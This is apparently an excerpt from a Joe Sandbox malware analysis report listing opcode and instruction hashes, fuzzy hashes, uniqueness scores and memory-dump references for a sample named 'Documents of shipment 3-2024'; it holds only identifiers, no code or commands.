                                              • Opcode ID: 36539a9950069a079cc19222f305c93a27d21487f45709038ca2fbb6625f7a74
                                              • Instruction ID: ed10cf65c37a12256c425cdb60d50660ff0ee948e974b09232b608c2df9dfb87
                                              • Opcode Fuzzy Hash: 36539a9950069a079cc19222f305c93a27d21487f45709038ca2fbb6625f7a74
                                              • Instruction Fuzzy Hash: A9218334E002099BCB29CFA9D44469EF7B2BF89304F50851AE815FB351DB71E941CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dd7e1104d71a649a1216ddb94e164fdb5d10809dbdba47aa64bd37f349382d45
                                              • Instruction ID: 36aa8ee72f9940ca7e9779741ddf75717b0fa82f7a972fcd5adac57090a4cb29
                                              • Opcode Fuzzy Hash: dd7e1104d71a649a1216ddb94e164fdb5d10809dbdba47aa64bd37f349382d45
                                              • Instruction Fuzzy Hash: C7211930B00609CFEB25EB6CC5957AE77F2BF89245F100468D506EB350DB368D40CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5b35c64ac5a9dfddb1640700a0ddbcb24334a5d7c904bb0b007fb9c7298a3153
                                              • Instruction ID: e80b8791342e4fa5f450b5ed0a6903355e80a0f82dcd20c499a873e920c7afb7
                                              • Opcode Fuzzy Hash: 5b35c64ac5a9dfddb1640700a0ddbcb24334a5d7c904bb0b007fb9c7298a3153
                                              • Instruction Fuzzy Hash: 2D219074A102084BEF35DB6DE98472D3769FB46300F118A25E816CF266EA78DCD08FA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fb0a4a910d857b8087dbb4bb9223984f7e442a40697bc7f59c239ef29f500cff
                                              • Instruction ID: f2da9f23dbb4d3f24d7536e2a4ce0a5269ffebcb06abcbb265052664f4f6dd60
                                              • Opcode Fuzzy Hash: fb0a4a910d857b8087dbb4bb9223984f7e442a40697bc7f59c239ef29f500cff
                                              • Instruction Fuzzy Hash: 5B21E474B00205CFDB24EF79D558AAD77F1FF89204B2044A8E506EB3A5EB769D40CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 859a9e18f75534445ce1e43db4ae6139f9551c67a0431f5e591f14bb32f0079d
                                              • Instruction ID: eb3f4cb351a71f1840ef02eab24907d08c67a1ebf905c2a7a2374cbdf33e1300
                                              • Opcode Fuzzy Hash: 859a9e18f75534445ce1e43db4ae6139f9551c67a0431f5e591f14bb32f0079d
                                              • Instruction Fuzzy Hash: 09118C30A403094BEF765A7DC80636D36A1FB82624F20892AF442CF2C2DA65CC858BD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2485428578.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_145d000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b94473c02430695b7a4514a999ae53825cb64c96b4b1997b3a632010a85b2bba
                                              • Instruction ID: df5f7bdabe4844775ee8290d6c5dd7803c58f87c282c498a73d35b39e9aa0aae
                                              • Opcode Fuzzy Hash: b94473c02430695b7a4514a999ae53825cb64c96b4b1997b3a632010a85b2bba
                                              • Instruction Fuzzy Hash: CB2171755083809FDB03CF64D994716BF71EF46214F28C5EAD8498F2A7C33A9806CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a162795dbde39c93c6b0543555a85ef30f8837a0e500c265558e93c81b6f599
                                              • Instruction ID: 0d577204b8340d013d12a9702249c2260f142e41b61f4272db427bf23392e24e
                                              • Opcode Fuzzy Hash: 3a162795dbde39c93c6b0543555a85ef30f8837a0e500c265558e93c81b6f599
                                              • Instruction Fuzzy Hash: 4A115E30B003098BEF769B7EC44536D3695FB86624F208839F406CF2C2DA65CC858BD2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2b6e3f78780f7b1488ac17d716fc593f69f20edef750f82e85ce266f2ebf5da6
                                              • Instruction ID: 623b8cde3b2f0adb18a1dc24257ae77b0137dbe12cea46cf03a4c38280278717
                                              • Opcode Fuzzy Hash: 2b6e3f78780f7b1488ac17d716fc593f69f20edef750f82e85ce266f2ebf5da6
                                              • Instruction Fuzzy Hash: F6110EB6F007559FCB60AB7D984961E7FE4FB89250B000465E909D7300EA34C881CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffbdc525714ec66e14c62b284dc24ed38d213cbdd1de7ebdebb21af5aaeab0bf
                                              • Instruction ID: 7ab849bd1195010b10add1248e0895783b346d770a33677873e05e02656b2b6c
                                              • Opcode Fuzzy Hash: ffbdc525714ec66e14c62b284dc24ed38d213cbdd1de7ebdebb21af5aaeab0bf
                                              • Instruction Fuzzy Hash: 23113C35A016168BCF35AFBC959029E7BF5FF88251F2404BAD805EB241E735C8418BD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ed37aea5ec60d3d73c0ed48bb9865419bdeaa8a0e0515d0ac567486dcc9b274
                                              • Instruction ID: 74d38f564fd01e3324ded6c0fac53c40e3d57033d4630e17eb3876ac2992d455
                                              • Opcode Fuzzy Hash: 9ed37aea5ec60d3d73c0ed48bb9865419bdeaa8a0e0515d0ac567486dcc9b274
                                              • Instruction Fuzzy Hash: 35014031A016169BCF35EFBC95901AE7BF6FB88251F2404BAD805EB341E736C8418BD5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45881a5b90e4863c1db91a53d84c4119f3de77a2422f7ecc71828123b28254c7
                                              • Instruction ID: 91dcdbb718a4881332ea45bd2eb612432a6fcd6b05b73a2719836ddc186e5b60
                                              • Opcode Fuzzy Hash: 45881a5b90e4863c1db91a53d84c4119f3de77a2422f7ecc71828123b28254c7
                                              • Instruction Fuzzy Hash: EE012870A002058BDB10DF59D884B8EBBB6FF85310F54C164C84C1F299DBB0ED45CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a8e22950278639603787830f3ea5f5469568bd270a9d2d00c2d1639481a35e3
                                              • Instruction ID: 05e84b6c19c26672c62844f9301e6c4b0f803ff34074c380dfa1acc12fd3c67f
                                              • Opcode Fuzzy Hash: 7a8e22950278639603787830f3ea5f5469568bd270a9d2d00c2d1639481a35e3
                                              • Instruction Fuzzy Hash: 87F0F036A04611CBDB328BAC94D01ACBFB1FAA91217AC40D7D802DF241E329D882CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4056b622a7438e94fc9d2bf2a9a52a7bd66e4e6486db80254305c15d530b6d93
                                              • Instruction ID: 519aeee42f4561bb76249303bb65fb324c51f00e181ae9b6016e374a561a4796
                                              • Opcode Fuzzy Hash: 4056b622a7438e94fc9d2bf2a9a52a7bd66e4e6486db80254305c15d530b6d93
                                              • Instruction Fuzzy Hash: 6A0126F09103498FEB06DBA9E84078C7F71EF42300B9487ECC4115B296DE756D81CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1ec8590431a1793c54b8c2b9fac333268a3578623745770dfa3ebf4d0a0e5a36
                                              • Instruction ID: a6bedcb954321825524ad29d310d9b40d9d4ae8b575ae10751ad997ace0516c3
                                              • Opcode Fuzzy Hash: 1ec8590431a1793c54b8c2b9fac333268a3578623745770dfa3ebf4d0a0e5a36
                                              • Instruction Fuzzy Hash: 67F0B239B40208CFC718DB68D5A8B6C7BB2FF88315F5144A8E5069B3A4DB35AD42CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000003.00000002.2486285523.00000000015D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_15d0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c12ceaf97fab3bca8df7c89bdbb86aeb2476ecbbad2c0cfc0c36146939a2e548
                                              • Instruction ID: c9868b5999c0b373350d353f0630b2eb4cbd93a009d5674876df31407165342a
                                              • Opcode Fuzzy Hash: c12ceaf97fab3bca8df7c89bdbb86aeb2476ecbbad2c0cfc0c36146939a2e548
                                              • Instruction Fuzzy Hash: 17F0AFF0E1020C9FDB04EFB9F88078C7BB5EB84700F9086A8C40597259EE706E94CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%